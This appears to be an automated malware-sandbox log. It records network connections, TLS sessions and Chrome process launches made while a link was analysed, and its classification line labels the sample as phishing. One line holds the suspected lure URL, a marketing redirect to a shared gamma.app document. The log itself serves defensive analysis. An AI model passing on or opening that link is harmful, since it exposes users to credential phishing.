    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.146.76.30:443 -> 192.168.2.16:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.132:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.54.200:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.138.7.117:443 -> 192.168.2.16:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.54.121:443 -> 192.168.2.16:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.16:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.16:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.66.57:443 -> 192.168.2.16:49816 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.71.250:443 -> 192.168.2.16:49817 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49822 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49824 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49823 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49820 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.224.12.105:443 -> 192.168.2.16:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.224.12.105:443 -> 192.168.2.16:49821 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.66.57:443 -> 192.168.2.16:49835 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 3.140.6.184:443 -> 192.168.2.16:49832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 3.140.6.184:443 -> 192.168.2.16:49833 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49838 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.194.217:443 -> 192.168.2.16:49839 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.248.151.210:443 -> 192.168.2.16:49840 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:49847 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.49.241.189:443 -> 192.168.2.16:49850 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.138.26.124:443 -> 192.168.2.16:49855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 54.161.6.100:443 -> 192.168.2.16:49853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.66.147.27:443 -> 192.168.2.16:49856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.200:443 -> 192.168.2.16:49865 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.248.151.210:443 -> 192.168.2.16:49870 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.200:443 -> 192.168.2.16:49873 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.245.46.55:443 -> 192.168.2.16:49875 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.245.46.55:443 -> 192.168.2.16:49874 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49885 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.195.170.131:443 -> 192.168.2.16:49886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.237.73.95:443 -> 192.168.2.16:49889 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.195.170.131:443 -> 192.168.2.16:49888 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.195.208.174:443 -> 192.168.2.16:49892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 194.195.208.174:443 -> 192.168.2.16:49890 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.16:49895 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49896 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49897 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49899 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49901 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.16:49898 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49903 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49904 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.16:49905 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.186.31:443 -> 192.168.2.16:49907 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49908 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49916 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.16:49928 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.233.102.105:443 -> 192.168.2.16:49933 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6940_2055038106
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6940_2055038106
    Source: classification engineClassification label: mal72.phis.win@24/12@100/216
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,10263868635164877779,4600966844859016141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,10263868635164877779,4600966844859016141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
